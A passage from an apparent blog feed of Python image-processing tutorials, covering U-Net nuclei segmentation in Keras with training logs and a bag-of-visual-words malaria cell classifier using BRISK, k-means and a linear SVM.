    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
    c5 = tf.keras.layers.Dropout(0.3)(c5)
    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

    # Expansive path (decoder)
    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
    u6 = tf.keras.layers.concatenate([u6, c4])
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
    c6 = tf.keras.layers.Dropout(0.2)(c6)
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
    u7 = tf.keras.layers.concatenate([u7, c3])
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
    c7 = tf.keras.layers.Dropout(0.2)(c7)
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
    u8 = tf.keras.layers.concatenate([u8, c2])
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
    c8 = tf.keras.layers.Dropout(0.1)(c8)
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
    c9 = tf.keras.layers.Dropout(0.1)(c9)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
    model.summary()
    Model: "model"__________________________________________________________________________________________________ Layer (type)                   Output Shape         Param #     Connected to                     ================================================================================================== input_2 (InputLayer)           [(None, 128, 128, 3  0           []                                                               )]                                                                                                                                                                   lambda (Lambda)                (None, 128, 128, 3)  0           ['input_2[0][0]']                                                                                                                   conv2d (Conv2D)                (None, 128, 128, 16  448         ['lambda[0][0]']                                                 )                                                                                                                                                                    dropout (Dropout)              (None, 128, 128, 16  0           ['conv2d[0][0]']                                                 )                                                                                                                                                                    conv2d_1 (Conv2D)              (None, 128, 128, 16  2320        ['dropout[0][0]']                                                )                                                                                                                                                                    max_pooling2d (MaxPooling2D)   (None, 64, 64, 16)   0           ['conv2d_1[0][0]']                                                                                                                  conv2d_2 (Conv2D)              (None, 64, 64, 32)   4640        ['max_pooling2d[0][0]']                                                                                                             dropout_1 (Dropout)            (None, 64, 64, 32)   0           ['conv2d_2[0][0]']                                                                                                                  conv2d_3 (Conv2D)              (None, 64, 64, 32)   9248        ['dropout_1[0][0]']                                                                                                                 max_pooling2d_1 (MaxPooling2D)  (None, 32, 32, 32)  0           ['conv2d_3[0][0]']                                                                                                                  conv2d_4 (Conv2D)              (None, 32, 32, 64)   18496       ['max_pooling2d_1[0][0]']                                                                                                           dropout_2 (Dropout)            (None, 32, 32, 64)   0           ['conv2d_4[0][0]']                                                                                                                  conv2d_5 (Conv2D)              (None, 32, 32, 64)   36928       ['dropout_2[0][0]']                                                                                                                 max_pooling2d_2 (MaxPooling2D)  (None, 16, 16, 64)  0           ['conv2d_5[0][0]']                                                                                                                  conv2d_6 (Conv2D)              (None, 16, 16, 128)  73856       ['max_pooling2d_2[0][0]']                 
                                                                                          dropout_3 (Dropout)            (None, 16, 16, 128)  0           ['conv2d_6[0][0]']                                                                                                                  conv2d_7 (Conv2D)              (None, 16, 16, 128)  147584      ['dropout_3[0][0]']                                                                                                                 max_pooling2d_3 (MaxPooling2D)  (None, 8, 8, 128)   0           ['conv2d_7[0][0]']                                                                                                                  conv2d_8 (Conv2D)              (None, 8, 8, 256)    295168      ['max_pooling2d_3[0][0]']                                                                                                           dropout_4 (Dropout)            (None, 8, 8, 256)    0           ['conv2d_8[0][0]']                                                                                                                  conv2d_9 (Conv2D)              (None, 8, 8, 256)    590080      ['dropout_4[0][0]']                                                                                                                 conv2d_transpose (Conv2DTransp  (None, 16, 16, 128)  131200     ['conv2d_9[0][0]']                ose)                                                                                                                                                                                                concatenate (Concatenate)      (None, 16, 16, 256)  0           ['conv2d_transpose[0][0]',                                                                         'conv2d_7[0][0]']                                                                                                                  conv2d_10 (Conv2D)             (None, 16, 16, 128)  295040      ['concatenate[0][0]']                                                                                                               dropout_5 (Dropout)            (None, 16, 16, 128)  0           ['conv2d_10[0][0]']                                                                                                                 conv2d_11 (Conv2D)             (None, 16, 16, 128)  147584      ['dropout_5[0][0]']                                                                                                                 conv2d_transpose_1 (Conv2DTran  (None, 32, 32, 64)  32832       ['conv2d_11[0][0]']               spose)                                                                                                                                                                                              concatenate_1 (Concatenate)    (None, 32, 32, 128)  0           ['conv2d_transpose_1[0][0]',                                                                       'conv2d_5[0][0]']                                                                                                                  conv2d_12 (Conv2D)             (None, 32, 32, 64)   73792       ['concatenate_1[0][0]']                                                                                                             dropout_6 (Dropout)            (None, 32, 32, 64)   0           ['conv2d_12[0][0]']                                                                                                                 conv2d_13 (Conv2D)             (None, 32, 32, 64)   36928       ['dropout_6[0][0]']                                                  
                                                               conv2d_transpose_2 (Conv2DTran  (None, 64, 64, 32)  8224        ['conv2d_13[0][0]']               spose)                                                                                                                                                                                              concatenate_2 (Concatenate)    (None, 64, 64, 64)   0           ['conv2d_transpose_2[0][0]',                                                                       'conv2d_3[0][0]']                                                                                                                  conv2d_14 (Conv2D)             (None, 64, 64, 32)   18464       ['concatenate_2[0][0]']                                                                                                             dropout_7 (Dropout)            (None, 64, 64, 32)   0           ['conv2d_14[0][0]']                                                                                                                 conv2d_15 (Conv2D)             (None, 64, 64, 32)   9248        ['dropout_7[0][0]']                                                                                                                 conv2d_transpose_3 (Conv2DTran  (None, 128, 128, 16  2064       ['conv2d_15[0][0]']               spose)                         )                                                                                                                                                                    concatenate_3 (Concatenate)    (None, 128, 128, 32  0           ['conv2d_transpose_3[0][0]',                                     )                                 'conv2d_1[0][0]']                                                                                                                  conv2d_16 (Conv2D)             (None, 128, 128, 16  4624        ['concatenate_3[0][0]']                                          )                                                                                                                                                                    dropout_8 (Dropout)            (None, 128, 128, 16  0           ['conv2d_16[0][0]']                                              )                                                                                                                                                                    conv2d_17 (Conv2D)             (None, 128, 128, 16  2320        ['dropout_8[0][0]']                                              )                                                                                                                                                                    conv2d_18 (Conv2D)             (None, 128, 128, 1)  17          ['conv2d_17[0][0]']                                                                                                                ==================================================================================================Total params: 1,941,105Trainable params: 1,941,105Non-trainable params: 0__________________________________________________________________________________________________
    from tensorflow.keras import utils
    from keras.utils.vis_utils import model_to_dot

    utils.plot_model(model, 'model1.png', show_shapes=True, show_dtype=True, show_layer_names=True)

    (figure: model architecture diagram from plot_model)
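
    The contraction and expansion blocks above all repeat the same two-conv-plus-dropout pattern. A compact refactoring sketch (not the tutorial's code, just an equivalent helper) makes that structure explicit:

    def conv_block(x, n_filters, drop_rate):
        # two 3x3 'same' convolutions with dropout in between, as in each block above
        x = tf.keras.layers.Conv2D(n_filters, (3, 3), activation='relu',
                                   kernel_initializer='he_normal', padding='same')(x)
        x = tf.keras.layers.Dropout(drop_rate)(x)
        x = tf.keras.layers.Conv2D(n_filters, (3, 3), activation='relu',
                                   kernel_initializer='he_normal', padding='same')(x)
        return x

    # e.g. the first contraction step then reads:
    # c1 = conv_block(s, 16, 0.1)
    # p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)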

    75 - Image Segmentation using U-Net - Part 3 (What are trainable parameters?)

    Explains how the number of parameters in a neural network is calculated.
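
    A quick worked example against this U-Net's summary (plain arithmetic, matching the Param # column above):

    # conv2d: 16 filters of 3x3 over the 3 input channels, plus 16 biases
    print(16 * (3 * 3 * 3) + 16)       # 448
    # conv2d_1: 16 filters of 3x3 over 16 channels
    print(16 * (3 * 3 * 16) + 16)      # 2320
    # conv2d_transpose: 128 filters of 2x2 over 256 input channels
    print(128 * (2 * 2 * 256) + 128)   # 131200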

    76 - Image Segmentation using U-Net - Part 4 (Model fitting, checkpoints, and callbacks)

    ModelCheckpoint

    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
    # NOTE: checkpointer is defined but never added to this list, so the
    # ModelCheckpoint callback never actually runs; include it for it to take effect.
    callbacks = [
        tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
        tf.keras.callbacks.TensorBoard(log_dir='logs')
    ]

    77 - Image Segmentation using U-Net - Part 5 (Understanding the data)

    Get the dataset: 2018 Data Science Bowl | Kaggle
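
    The directory layout the loading code in Part 6 assumes (one folder per image id, with the nuclei masks split one per file):

    stage1_train/
        <image_id>/
            images/
                <image_id>.png        # the microscopy image
            masks/
                <mask_1>.png          # one binary mask per nucleus
                <mask_2>.png
                ...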

    78 - Image Segmentation using U-Net - Part 6 (Running the code and understanding results)

    import tensorflow as tf
    import os
    import numpy as np

    IMG_WIDTH = 128
    IMG_HEIGHT = 128
    IMG_CHANNELS = 3

    TRAIN_PATH = 'stage1_train/'
    TEST_PATH = 'stage1_test/'

    train_ids = next(os.walk(TRAIN_PATH))[1]
    test_ids = next(os.walk(TEST_PATH))[1]

    X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
    Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_) # Y is a binary mask

    Resizing training images and masks

    import random
    from tqdm import tqdm
    from skimage.io import imread, imshow
    from skimage.transform import resize
    import matplotlib.pyplot as plt

    seed = 42
    np.random.seed(seed)  # seed NumPy's RNG (np.random.seed = seed would only overwrite the function)

    print('Resizing training images and masks')
    for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
        path = TRAIN_PATH + id_
        img = imread(path + '/images/' + id_ + '.png')[:, :, :IMG_CHANNELS]  # read the image
        img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)  # resize to 128x128
        X_train[n] = img  # fill empty X_train with values from img
        mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)
        # combine the individual per-nucleus masks for this image into one mask
        for mask_file in next(os.walk(path + '/masks/'))[2]:
            mask_ = imread(path + '/masks/' + mask_file)
            mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
                                          preserve_range=True), axis=-1)
            mask = np.maximum(mask, mask_)

        Y_train[n] = mask  # fill empty Y_train with the combined mask
    Resizing training images and masks
    100%|██████████| 670/670 [04:38<00:00,  2.41it/s]

    Resizing test images

    X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
    sizes_test = []
    print('Resizing test images')
    for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
        path = TEST_PATH + id_
        img = imread(path + '/images/' + id_ + '.png')[:, :, :IMG_CHANNELS]
        sizes_test.append([img.shape[0], img.shape[1]])  # remember original sizes
        img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
        X_test[n] = img

    print('Done!')
    Resizing test images
    100%|██████████| 65/65 [00:01<00:00, 50.05it/s]
    Done!


    image_x = random.randint(0, len(train_ids) - 1)  # randint is inclusive at both ends
    imshow(X_train[image_x])
    plt.show()

    (figure: random training image)

    imshow(np.squeeze(Y_train[image_x]))
    plt.show()

    (figure: corresponding ground-truth mask)

    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # normalize pixel values to [0, 1] (uint8 -> float)

    # Contraction path (encoder)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
    c1 = tf.keras.layers.Dropout(0.1)(c1)
    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
    c2 = tf.keras.layers.Dropout(0.1)(c2)
    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
    c3 = tf.keras.layers.Dropout(0.2)(c3)
    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
    c4 = tf.keras.layers.Dropout(0.2)(c4)
    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
    c5 = tf.keras.layers.Dropout(0.3)(c5)
    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

    # Expansive path (decoder)
    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
    u6 = tf.keras.layers.concatenate([u6, c4])
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
    c6 = tf.keras.layers.Dropout(0.2)(c6)
    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
    u7 = tf.keras.layers.concatenate([u7, c3])
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
    c7 = tf.keras.layers.Dropout(0.2)(c7)
    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
    u8 = tf.keras.layers.concatenate([u8, c2])
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
    c8 = tf.keras.layers.Dropout(0.1)(c8)
    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
    c9 = tf.keras.layers.Dropout(0.1)(c9)
    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

    ModelCheckpoint

    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
    # NOTE: as in Part 4, checkpointer is not in this list, so it never fires during the fit below
    callbacks = [
        tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
        tf.keras.callbacks.TensorBoard(log_dir='logs')
    ]
    results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
    Epoch 1/25: 38/38 - 20s 280ms/step - loss: 0.5785 - accuracy: 0.7459 - val_loss: 0.3360 - val_accuracy: 0.7809
    Epoch 2/25: 38/38 - 7s 173ms/step - loss: 0.2739 - accuracy: 0.8642 - val_loss: 0.2158 - val_accuracy: 0.9125
    Epoch 3/25: 38/38 - 7s 174ms/step - loss: 0.1924 - accuracy: 0.9304 - val_loss: 0.1558 - val_accuracy: 0.9406
    Epoch 4/25: 38/38 - 7s 173ms/step - loss: 0.1589 - accuracy: 0.9422 - val_loss: 0.1474 - val_accuracy: 0.9425
    Epoch 5/25: 38/38 - 7s 175ms/step - loss: 0.1449 - accuracy: 0.9472 - val_loss: 0.1173 - val_accuracy: 0.9543
    Epoch 6/25: 38/38 - 7s 176ms/step - loss: 0.1394 - accuracy: 0.9480 - val_loss: 0.1090 - val_accuracy: 0.9565
    Epoch 7/25: 38/38 - 7s 176ms/step - loss: 0.1246 - accuracy: 0.9540 - val_loss: 0.1084 - val_accuracy: 0.9579
    Epoch 8/25: 38/38 - 7s 177ms/step - loss: 0.1204 - accuracy: 0.9553 - val_loss: 0.1113 - val_accuracy: 0.9577
    Epoch 9/25: 38/38 - 7s 177ms/step - loss: 0.1124 - accuracy: 0.9581 - val_loss: 0.0957 - val_accuracy: 0.9611
    Epoch 10/25: 38/38 - 7s 177ms/step - loss: 0.1087 - accuracy: 0.9591 - val_loss: 0.0930 - val_accuracy: 0.9618
    Epoch 11/25: 38/38 - 7s 179ms/step - loss: 0.1079 - accuracy: 0.9593 - val_loss: 0.0892 - val_accuracy: 0.9650
    Epoch 12/25: 38/38 - 7s 179ms/step - loss: 0.1044 - accuracy: 0.9605 - val_loss: 0.0918 - val_accuracy: 0.9643
    Epoch 13/25: 38/38 - 7s 180ms/step - loss: 0.1021 - accuracy: 0.9608 - val_loss: 0.0888 - val_accuracy: 0.9651
    Epoch 14/25: 38/38 - 7s 180ms/step - loss: 0.0989 - accuracy: 0.9621 - val_loss: 0.0950 - val_accuracy: 0.9616
    Epoch 15/25: 38/38 - 7s 180ms/step - loss: 0.1003 - accuracy: 0.9612 - val_loss: 0.0858 - val_accuracy: 0.9661
    Epoch 16/25: 38/38 - 7s 180ms/step - loss: 0.1005 - accuracy: 0.9613 - val_loss: 0.0872 - val_accuracy: 0.9660
    Epoch 17/25: 38/38 - 7s 181ms/step - loss: 0.0963 - accuracy: 0.9630 - val_loss: 0.0846 - val_accuracy: 0.9659
    Epoch 18/25: 38/38 - 7s 184ms/step - loss: 0.0956 - accuracy: 0.9632 - val_loss: 0.0840 - val_accuracy: 0.9665
    Epoch 19/25: 38/38 - 7s 183ms/step - loss: 0.0925 - accuracy: 0.9642 - val_loss: 0.0819 - val_accuracy: 0.9675
    Epoch 20/25: 38/38 - 7s 183ms/step - loss: 0.0927 - accuracy: 0.9640 - val_loss: 0.0833 - val_accuracy: 0.9677
    Epoch 21/25: 38/38 - 7s 183ms/step - loss: 0.0917 - accuracy: 0.9641 - val_loss: 0.0846 - val_accuracy: 0.9660

    Training stops after epoch 21: EarlyStopping(patience=2) fires because val_loss never improved on its epoch-19 best (0.0819) for two consecutive epochs.
idx = random.randint(0, len(X_train) - 1)  # random index (note: randint's upper bound is inclusive)

preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
preds_test = model.predict(X_test, verbose=1)

# Threshold the sigmoid outputs at 0.5 to get binary masks
preds_train_t = (preds_train > 0.5).astype(np.uint8)
preds_val_t = (preds_val > 0.5).astype(np.uint8)
preds_test_t = (preds_test > 0.5).astype(np.uint8)
19/19 [==============================] - 5s 161ms/step
3/3 [==============================] - 0s 91ms/step
3/3 [==============================] - 1s 417ms/step

    Perform a sanity check on some random training samples

ix = random.randint(0, len(preds_train_t) - 1)  # -1 avoids an off-by-one, since randint is inclusive
imshow(X_train[ix])
plt.show()
imshow(np.squeeze(Y_train[ix]))
plt.show()
imshow(np.squeeze(preds_train_t[ix]))
plt.show()

    png

    png

C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\io\_plugins\matplotlib_plugin.py:150: UserWarning: Low image data range; displaying image with stretched contrast.
  lo, hi, cmap = _get_display_range(image)

    png

    Perform a sanity check on some random validation samples

ix = random.randint(0, len(preds_val_t) - 1)
imshow(X_train[int(X_train.shape[0]*0.9):][ix])
plt.show()
imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
plt.show()
imshow(np.squeeze(preds_val_t[ix]))
plt.show()

    png

    png

    png

Visualizing the results (TensorBoard)

    !tensorboard --logdir=logs/ --host localhost --port 8088

    png

    ]]>
    @@ -8741,7 +8741,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(69)-BOVW/ - 正文

69 - Image classification using Bag of Visual Words (BOVW)

    Bag-of-words 模型入门

It is used for image classification, not pixel-level segmentation.

All cell images are resized to 128 x 128.
The images used for testing are completely different from the ones used for training.
136 images for testing, parasitized and uninfected each (136 x 2)
104 images for training, parasitized and uninfected each (104 x 2)
Lots of data cannot be uploaded to GitHub, so 10 images of each class were uploaded.
Download the full dataset from: ftp://lhcftp.nlm.nih.gov/Open-Access-Datasets/Malaria/cell_images.zip
That link no longer seems to work; an alternative source: https://www.kaggle.com/datasets/iarunava/cell-images-for-detecting-malaria?resource=download

    Train_BOVW

    import cv2
    import numpy as np
    import os
• Get the training class names and store them in a list
• Here we use folder names for class names
train_path = 'images/cell_images/train'  # Folder names are Parasitized and Uninfected
training_names = os.listdir(train_path)
• Get the path to every image and save the paths in image_paths, with the corresponding labels in image_classes
    image_paths = []
    image_classes = []
    class_id = 0
    • To make it easy to list all file names in a directory let us define a function
def imglist(path):
    return [os.path.join(path, f) for f in os.listdir(path)]
• Fill the placeholder empty lists with image paths and classes, and increment the class ID number
for training_name in training_names:
    dir = os.path.join(train_path, training_name)
    class_path = imglist(dir)
    image_paths += class_path
    image_classes += [class_id] * len(class_path)
    class_id += 1
    image_paths
['images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_87.png',
 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_88.png',
 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_87.png',
 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_88.png',
 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133238a_cell_97.png',
 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112043_cell_202.png',
 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112043_cell_203.png',
 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112116_cell_204.png',
 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112116_cell_205.png',
 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112138_cell_183.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104919_cell_240.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_102.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_11.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_139.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_151.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_20.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_4.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_59.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_72.png',
 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_98.png']
• Two classes in total: Parasitized and Uninfected
    image_classes
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
    class_id
    2
• Create feature extraction and keypoint detector objects
• SIFT was not available in the OpenCV builds used here (it has since returned in OpenCV 4.4+ after its patent expired)
• Create a list where all the descriptors will be stored
    des_list = []

OpenCV scale-invariant feature detection: SIFT, SURF, BRISK, ORB

• BRISK is a good replacement for SIFT. ORB also works but did not work well for this example
brisk = cv2.BRISK_create(30)
for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))
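One practical caveat (my note, not from the original tutorial): detectAndCompute returns des = None for images in which it finds no keypoints, and a None entry would break the np.vstack descriptor stacking below. A defensive variant of the loop:

# Hypothetical guard: skip images where BRISK finds no keypoints.
for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    if des is not None:
        des_list.append((image_path, des))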
    • Stack all the descriptors vertically in a numpy array
descriptors = des_list[0][1]
for image_path, descriptor in des_list[1:]:
    descriptors = np.vstack((descriptors, descriptor))
    descriptors
array([[244, 255, 223, ...,   0,  17,  48],
       [254, 191, 247, ...,   8,  25,   0],
       [240, 255, 255, ..., 137,  25,   0],
       ...,
       [128, 255, 255, ...,   0,   0,   0],
       [176, 255, 255, ...,   0,   0,   0],
       [240, 255, 255, ...,   0,   0,   0]], dtype=uint8)
    • kmeans works only on float, so convert integers to float
    descriptors_float = descriptors.astype(float)
    • Perform k-means clustering and vector quantization

k-means is used here (to build the vocabulary); an SVM or Random Forest could also be used.

from scipy.cluster.vq import kmeans, vq

k = 200  # k-means with 100 clusters gave lower accuracy for the aeroplane example
voc, variance = kmeans(descriptors_float, k, 1)
• Calculate the histogram of features and represent each image as a vector
• vq assigns codes from a code book to observations
im_features = np.zeros((len(image_paths), k), "float32")
for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1], voc)
    for w in words:
        im_features[i][w] += 1
    words
array([ 48,  14,  24,  50,  86, 177, 199,  91,  24,  15,  21,  44,  86,
       192,  71,  46, 193,  59, 154,   2,  80, 119,  43])
    distance
array([ 79.62537284,  76.25693411, 150.61976132,   0.        ,
       189.20699172, 167.46438427,   0.        , 132.3697473 ,
        95.40341975, 137.6727198 , 113.90895487, 104.85068749,
       104.80526159,   0.        , 170.24394262, 220.20785635,
       118.6493433 ,  77.81910113,   0.        , 101.40636075,
       217.89599966,  84.18283673, 133.43163043])
• Perform Tf-Idf vectorization
    nbr_occurences = np.sum((im_features > 0) * 1, axis=0)
    idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')
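The idf vector is computed above but never multiplied into im_features, so the classifier is trained on raw word counts. If you wanted to apply the tf-idf weighting, a minimal sketch (my addition, not in the original tutorial) would be:

# Hypothetical: scale each visual-word column by its idf weight.
# im_features has shape (n_images, k) and idf has shape (k,), so
# NumPy broadcasting applies idf across all rows.
im_features = im_features * idf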
• Scale the word histograms: standardize features by removing the mean and scaling to unit variance (a form of normalization)
    from sklearn.preprocessing import StandardScaler
    stdSlr = StandardScaler().fit(im_features)
    im_features = stdSlr.transform(im_features)
    • Train an algorithm to discriminate vectors corresponding to positive and negative training images
    • Train the Linear SVM
from sklearn.svm import LinearSVC
clf = LinearSVC(max_iter=10000)  # the default (1000) does not converge here
clf.fit(im_features, np.array(image_classes))
    • Save the SVM
    • Joblib dumps Python object into one file
    import joblib
    joblib.dump((clf, training_names, stdSlr, k, voc), "bovw.pkl", compress=3)
    ['bovw.pkl']

    Validate_BOVW

    import cv2
    import numpy as np
    import os
    import pylab as pl
    from sklearn.metrics import confusion_matrix, accuracy_score # sreeni
    import joblib
    • Load the classifier, class names, scaler, number of clusters and vocabulary from stored pickle file (generated during training)
    clf, classes_names, stdSlr, k, voc = joblib.load("bovw.pkl")
• If you run this on the training images instead of the test images, you get (misleadingly) high accuracy
    test_path = 'images/cell_images/test'
    testing_names = os.listdir(test_path)
# Get the path to all images and save them in a list
# image_paths holds the paths and image_classes the corresponding labels
image_paths = []
image_classes = []
class_id = 0

# To make it easy to list all file names in a directory let us define a function
def imglist(path):
    return [os.path.join(path, f) for f in os.listdir(path)]

# Fill the placeholder empty lists with image paths and classes, and add the class ID number
for testing_name in testing_names:
    dir = os.path.join(test_path, testing_name)
    class_path = imglist(dir)
    image_paths += class_path
    image_classes += [class_id] * len(class_path)
    class_id += 1

# Create feature extraction and keypoint detector objects
# SIFT was not available in the OpenCV builds used here
# Create a list where all the descriptors will be stored
des_list = []

# BRISK is a good replacement for SIFT. ORB also works but did not work well for this example
brisk = cv2.BRISK_create(30)

for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))

# Stack all the descriptors vertically in a numpy array
# (bug fix: the original iterated over des_list[0:], which stacked the first descriptor block twice)
descriptors = des_list[0][1]
for image_path, descriptor in des_list[1:]:
    descriptors = np.vstack((descriptors, descriptor))

# Calculate the histogram of features
# vq assigns codes from a code book to observations
from scipy.cluster.vq import vq
test_features = np.zeros((len(image_paths), k), "float32")
for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1], voc)
    for w in words:
